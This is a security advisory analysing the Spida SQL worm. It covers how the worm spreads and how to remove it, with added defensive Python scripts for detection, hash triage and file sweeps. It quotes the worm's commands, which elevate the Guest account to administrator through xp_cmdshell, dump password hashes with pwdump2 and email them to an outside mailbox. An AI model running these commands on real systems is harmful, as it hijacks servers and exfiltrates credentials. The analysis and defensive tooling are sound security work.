eEye Digital Security - Security Advisory AL20020522

ANALYSIS: Spida or Digispid.B.Worm SQL Worm

Release Date:
5/22/2002 12:00:00 AM

Date Reported:
5/22/2002 12:00:00 AM

Severity:
High

Vendor:
Microsoft

Affected Software:
Default installations of Microsoft SQL Server

Overview:
The SQL worm (AKA: Spida, Digispid.B.Worm) infects by inserting itself into MSSQL database servers with no password protecting the SA (System Administrator) account. The worm executes commands on the vulnerable server using the "xp_cmdshell" General Extended Procedure, and the commands it executes activate and configure the Windows "Guest" account so it can be used to copy files over to the vulnerable machine via Windows file sharing. After the files have been copied over, they are "hidden" and the worm goes into a cleanup phase. It deactivates the Guest account and changes the password for the SA account.

The worm then creates a file containing details about the network interfaces, database, and Windows account password hashes. This file is emailed to ixltd@postone.com, which we are guessing is an email box created by the worm's author. Finally, the target machine begins to scan for other machines and continues the chain of infection.

Technical Details:
As mentioned before, the SQL worm spreads by inserting itself into MSSQL database servers that have no password protecting the SA (System Administrator) account. It executes commands in a command shell (cmd.exe) using the "xp_cmdshell" General Extended Procedure.

The commands the worm executes are as follows:

net user guest /active:yes
net user guest [random 4 byte lowercase alpha string]
net localgroup administrators guest /add
net group "Domain Admins" guest /add

This activates the Guest account, sets a new password on it, and adds it to the local Administrators group and, if the server is a domain member, the "Domain Admins" group. Because the commands run through xp_cmdshell, they execute with the privileges of the SQL Server service account, which on a default installation is typically LocalSystem.
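The four net.exe commands above are the worm's fingerprint on the host. The following script, an added example that is not part of the eEye advisory or the worm's code, parses net.exe command lines as they would appear in an xp_cmdshell trace or a command-line audit log and flags the sequence the advisory describes: Guest activated, given a password, added to a privileged group, and later deactivated again. The SAMPLE_COMMANDS list is constructed for the example; the random password "kqzt" and the "alice" command are placeholders.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: command strings as they would appear in a SQL Profiler
# trace of xp_cmdshell calls or a host command-line audit log. The first seven
# mirror the Guest-account commands and the cleanup the advisory describes;
# the last two are ordinary administration noise that must not alert.
SAMPLE_COMMANDS = [
    "net user guest /active:yes",
    "net user guest kqzt",
    "net localgroup administrators guest /add",
    'net group "Domain Admins" guest /add',
    "net user guest /active:no",
    "net localgroup administrators guest /delete",
    'net group "Domain Admins" guest /delete',
    "net user alice P@ssw0rd!",
    "net start mssqlserver",
]

PRIVILEGED_GROUPS = {"administrators", "domain admins"}

# net <verb> <name-or-"quoted name"> <rest>
NET_RE = re.compile(r'^\s*net\s+(user|localgroup|group)\s+("[^"]*"|\S+)(.*)$', re.I)


@dataclass
class NetEvent:
    verb: str              # user | localgroup | group
    target: str            # account (net user) or group (localgroup/group), lower-cased
    member: Optional[str]  # account being added to / removed from a group
    action: str            # activate | deactivate | setpassword | add | delete | other


def parse_net_command(cmd: str) -> Optional[NetEvent]:
    """Turn one net.exe command line into a NetEvent; None if it is not a
    user/group command. Quoted names such as "Domain Admins" are handled."""
    m = NET_RE.match(cmd)
    if not m:
        return None
    verb = m.group(1).lower()
    target = m.group(2).strip('"').lower()
    args = m.group(3).split()
    switches = {a.lower() for a in args if a.startswith("/")}
    positional = [a.strip('"') for a in args if not a.startswith("/")]
    if verb == "user":
        if "/active:yes" in switches:
            action = "activate"
        elif "/active:no" in switches:
            action = "deactivate"
        elif positional:            # "net user guest <password>"
            action = "setpassword"
        else:
            action = "other"
        return NetEvent(verb, target, None, action)
    member = positional[0].lower() if positional else None
    action = "add" if "/add" in switches else "delete" if "/delete" in switches else "other"
    return NetEvent(verb, target, member, action)


def detect_guest_escalation(commands: List[str]) -> List[str]:
    """Flag the Spida pattern over a batch of commands: Guest activated, given
    a password and added to a privileged group. The later cleanup is reported
    too, because after it the Guest account looks untouched to a casual check."""
    events = [e for e in map(parse_net_command, commands) if e is not None]
    guest_user = [e for e in events if e.verb == "user" and e.target == "guest"]
    activated = any(e.action == "activate" for e in guest_user)
    pw_set = any(e.action == "setpassword" for e in guest_user)
    deactivated = any(e.action == "deactivate" for e in guest_user)
    escalated = sorted({e.target for e in events
                        if e.verb in ("localgroup", "group") and e.member == "guest"
                        and e.action == "add" and e.target in PRIVILEGED_GROUPS})
    findings = []
    if escalated:
        findings.append("guest added to privileged group(s): " + ", ".join(escalated))
    if activated and pw_set:
        findings.append("guest account activated and given a new password")
    if escalated and deactivated:
        findings.append("guest deactivated after escalation: cleanup phase, check group history")
    return findings


if __name__ == "__main__":
    for finding in detect_guest_escalation(SAMPLE_COMMANDS):
        print("ALERT:", finding)
```

Run it against the sample and all three findings fire; feed it only routine administration and it stays silent. In practice the command strings come from wherever xp_cmdshell activity is recorded on the server; the point of the cleanup finding is that, by the time a responder looks, "net user guest" will once again report the account as inactive.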

Next, the worm "unhides" its files on the already-infected "attacker" machine, then copies them into the Windows system directory of the vulnerable MSSQL server over the file share opened up by the Guest account. You will not see these files in a normal directory listing because they are marked "hidden". You can use the "attrib" command from the command shell (cmd.exe) to unhide and then delete them. The description and location of these files are listed below:

FSCAN portscanner:
%WinDir%\system32\drivers\services.exe

Used to run commands on a remote MSSQL server:
%WinDir%\system32\sqlexec.js

Command Line Emailer:
%WinDir%\system32\clemail.exe

Core worm processing script - contains functionality for scanning, backdooring, and the sending of retrieved data to the assumed author of the worm:
%WinDir%\system32\sqlprocess.js

Used for initial worm infection once a vulnerable host is identified:
%WinDir%\system32\sqlinstall.bat

Collects general information about local databases:
%WinDir%\system32\sqldir.js

Simple JavaScript interface to a command shell:
%WinDir%\system32\run.js

Timing library used by the worm:
%WinDir%\system32\timer.dll

SAM library used by pwdump.exe:
%WinDir%\system32\samdump.dll

Grabs password hashes for Windows user accounts; these are not the actual passwords, but retrieving the actual password is very possible if the existing passwords are weak:
%WinDir%\system32\pwdump2.exe

Note: %WinDir% is just an environment variable for your Windows base directory. The shell will replace this with the name of your registered Windows directory. This is usually "Winnt" or "Windows".

Next the worm deactivates the Guest account and removes it from the Administrators and "Domain Admins" groups. After the Guest account has been deactivated, the worm also changes the SA account password to a random four-byte lowercase alpha string, locking administrators out of their own server until the password is reset. The worm instance on the target machine then creates a file containing the network configuration, database details and Windows password hashes of the server it has just infected. After the file is assembled it is mailed to the assumed author of the worm. This is done with the following commands (WScript.Arguments(0) is the random SA password the worm has just set):

shell.Run("cmd /c ipconfig /all > send.txt", 0, true);
shell.Run("cmd /c cscript sqldir.js . sa " + WScript.Arguments(0) + " /r3s >> send.txt", 0, true);
shell.Run("cmd /c pwdump2 >> send.txt", 0, true);
shell.Run("clemail.exe -bodyfile send.txt -to ixltd@postone.com -subject SystemData-" + WScript.Arguments(0), 0, true);

Now the worm triggers the infected target machine to start infecting other machines in the same manner that it was infected.
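What leaves the server in send.txt is, among other things, the full pwdump2 dump of the SAM. A responder should treat that dump as compromised and decide which accounts to reset first. The script below is an added example, not part of the eEye advisory or of the worm, that parses pwdump2's "name:rid:lmhash:nthash:::" records and triages them: an NT hash equal to the well-known empty-password hash means a blank password; any LM hash other than the empty-password LM hash means the password is at most 14 characters, case-folded and cheap to crack; an LM hash whose second half is the empty-half constant means the password is shorter than 8 characters. The hash constants are properties of the LM and NT algorithms; the SAMPLE_PWDUMP records are constructed for the example and come from no real system.

```python
import re
from typing import Dict, List, NamedTuple, Set

# Constants of the LM/NT hash algorithms (not sample data): the LM and NT
# hashes of an empty password, and the LM half produced when the second
# 7-byte half of the password is all padding, i.e. the password is < 8 chars.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
LM_EMPTY_HALF = "aad3b435b51404ee"

# Constructed sample in pwdump2's "name:rid:lmhash:nthash:::" format. The
# hash values are illustrative; the trailing line is deliberate garbage.
SAMPLE_PWDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SQLService:1001:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
dba:1002:e52cac67419a9a22aad3b435b51404ee:1c0a13d17f8c9e2f3ee3f5f40ee1b4c2:::
backup:1003:aad3b435b51404eeaad3b435b51404ee:0f92a86f3b1ce8f4a5a2d1bdf0d2e9c7:::
garbage line that is not a hash record
"""

EMPTY_PASSWORD = "empty-password"
LM_STORED = "lm-hash-stored"
SHORT_PASSWORD = "lm-second-half-empty"
NT_ONLY = "nt-only"

HEX32 = re.compile(r"[0-9a-f]{32}")


class Entry(NamedTuple):
    name: str
    rid: int
    lm: str
    nt: str


def parse_pwdump(text: str) -> List[Entry]:
    """Parse pwdump2 output, skipping lines that are not well-formed records."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if not (HEX32.fullmatch(lm) and HEX32.fullmatch(nt)):
            continue
        entries.append(Entry(parts[0], int(parts[1]), lm, nt))
    return entries


def triage(entries: List[Entry]) -> Dict[str, Set[str]]:
    """Return, per account, the set of issues a responder should act on."""
    report: Dict[str, Set[str]] = {}
    for e in entries:
        issues: Set[str] = set()
        if e.nt == EMPTY_NT:
            issues.add(EMPTY_PASSWORD)
        if e.lm != EMPTY_LM:
            issues.add(LM_STORED)
            if e.lm[16:] == LM_EMPTY_HALF:
                issues.add(SHORT_PASSWORD)
        elif e.nt != EMPTY_NT:
            issues.add(NT_ONLY)          # LM disabled or password > 14 chars
        report[e.name] = issues
    return report


def must_reset(report: Dict[str, Set[str]]) -> List[str]:
    """Accounts to reset first: blank password, or an LM hash that is cheap
    to crack now that the dump has left the machine."""
    return sorted(name for name, issues in report.items()
                  if issues & {EMPTY_PASSWORD, LM_STORED})


if __name__ == "__main__":
    report = triage(parse_pwdump(SAMPLE_PWDUMP))
    for name, issues in report.items():
        print(f"{name:15s} {', '.join(sorted(issues)) or 'ok'}")
    print("reset first:", ", ".join(must_reset(report)))
```

The ordering matters for incident response: once the dump has been emailed out, every account with an LM hash should be assumed crackable offline, so those and the blank-password accounts are reset before the NT-only ones. The advisory's own advice to change every password on an infected machine still stands; this only tells you where to start.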

Related Links:
Free SQL Worm Scanner from eEye Digital Security
http://www.eeye.com/html/Research/Tools/sqlworm.html

SQLSecurity.com
http://sqlsecurity.com/

Trend Micro Analysis
http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=JS_SQLSPIDA.B

McAfee Analysis
http://vil.nai.com/vil/content/v_99499.htm

PWDump info
http://www.polivec.com/pwdump3.html

Protection:
Removal:
Change your MSSQL Server "SA" password immediately and disable the Windows Guest account. If you currently use the Guest account then you should change its password. You should also change the passwords of every other account on an infected machine, because upon infection the password hashes for each account were collected by the worm and emailed to the worm's author. The passwords may have been recovered by the author or by anyone on the network path between the infected machine and that mailbox.

Delete the following registry values, which the worm modified (restore them from a known-good system if the NetDDE service is needed; the first two belong to that service's configuration):

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetDDE\ImagePath
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NetDDE\Start
HKEY_LOCAL_MACHINE\software\microsoft\mssqlserver\client\connectto\dsquery


Delete the worm files:

attrib -h %WinDir%\system32\drivers\services.exe
attrib -h %WinDir%\system32\sqlexec.js
attrib -h %WinDir%\system32\clemail.exe
attrib -h %WinDir%\system32\sqlprocess.js
attrib -h %WinDir%\system32\sqlinstall.bat
attrib -h %WinDir%\system32\sqldir.js
attrib -h %WinDir%\system32\run.js
attrib -h %WinDir%\system32\timer.dll
attrib -h %WinDir%\system32\samdump.dll
attrib -h %WinDir%\system32\pwdump2.exe
del %WinDir%\system32\drivers\services.exe
del %WinDir%\system32\sqlexec.js
del %WinDir%\system32\clemail.exe
del %WinDir%\system32\sqlprocess.js
del %WinDir%\system32\sqlinstall.bat
del %WinDir%\system32\sqldir.js
del %WinDir%\system32\run.js
del %WinDir%\system32\timer.dll
del %WinDir%\system32\samdump.dll
del %WinDir%\system32\pwdump2.exe

Unregister the timer.dll used for scan and infection timing:

regsvr32 /u TIMER.DLL
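A removal is only as good as the check that it worked. The script below is an added example, not part of the eEye advisory, that sweeps a Windows directory for the ten file names listed above and reports each one found with its size and whether it carries the "hidden" attribute (the attribute is only available from os.stat on Windows; elsewhere it is reported as False). The make_demo_tree fixture is constructed for the example so the sweep can be exercised offline; the C:\Windows fallback in default_windir is an assumption for hosts where neither %WinDir% nor %SystemRoot% is set.

```python
import os
import sys
import tempfile
from typing import List, Tuple

# The file names the advisory lists, relative to %WinDir%\system32.
WORM_FILES = [
    ("drivers", "services.exe"),
    ("sqlexec.js",),
    ("clemail.exe",),
    ("sqlprocess.js",),
    ("sqlinstall.bat",),
    ("sqldir.js",),
    ("run.js",),
    ("timer.dll",),
    ("samdump.dll",),
    ("pwdump2.exe",),
]

FILE_ATTRIBUTE_HIDDEN = 0x2   # Win32 attribute bit; os.stat exposes it on Windows only


def default_windir() -> str:
    """Resolve %WinDir% as the advisory's note describes; the final fallback
    is an assumption for hosts where neither variable is set."""
    return os.environ.get("WINDIR") or os.environ.get("SystemRoot") or r"C:\Windows"


def sweep(windir: str) -> List[Tuple[str, int, bool]]:
    """Return (relative path, size, hidden?) for every listed worm file that
    exists under <windir>\\system32. Relative paths use '/' so results compare
    the same on every OS."""
    sys32 = os.path.join(windir, "system32")
    hits = []
    for parts in WORM_FILES:
        path = os.path.join(sys32, *parts)
        if not os.path.lexists(path):
            continue
        st = os.lstat(path)
        hidden = bool(getattr(st, "st_file_attributes", 0) & FILE_ATTRIBUTE_HIDDEN)
        hits.append(("/".join(parts), st.st_size, hidden))
    return hits


def hit_names(windir: str) -> List[str]:
    """Just the relative paths found, sorted, for quick comparison."""
    return sorted(h[0] for h in sweep(windir))


def make_demo_tree() -> str:
    """Constructed fixture: an empty fake %WinDir% with two of the worm's
    file names planted (placeholder content, not worm code)."""
    root = tempfile.mkdtemp(prefix="spida-demo-")
    os.makedirs(os.path.join(root, "system32", "drivers"))
    for parts in (("drivers", "services.exe"), ("sqlprocess.js",)):
        with open(os.path.join(root, "system32", *parts), "wb") as f:
            f.write(b"placeholder, not worm code")
    return root


if __name__ == "__main__":
    # Usage on a real host:  python spida_sweep.py %WinDir%
    target = sys.argv[1] if len(sys.argv) > 1 else make_demo_tree()
    found = sweep(target)
    if not found:
        print("no Spida artifacts under", target)
    for rel, size, hidden in found:
        print(f"FOUND {rel}  {size} bytes  hidden={hidden}")
```

Run it before and after the attrib/del steps above; a clean second run confirms the file side of the removal. A services.exe under system32\drivers is suspicious on its own, since the legitimate services.exe lives directly in system32. samdump.dll and pwdump2.exe are also stand-alone tools that an administrator could have placed there deliberately, so confirm provenance before deleting rather than relying on the name alone.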

Prevention:
1) Change the "SA" account password on any MSSQL database server that you administer so that it is not blank or easy to guess.

2) Get all of the latest Service Packs and Hotfixes from Microsoft to help prevent general worm infection.

Vendor Status:

Credit:
Riley Hassell

Copyright ©1998-2011 eEye Digital Security
Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission.

Disclaimer
The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk.
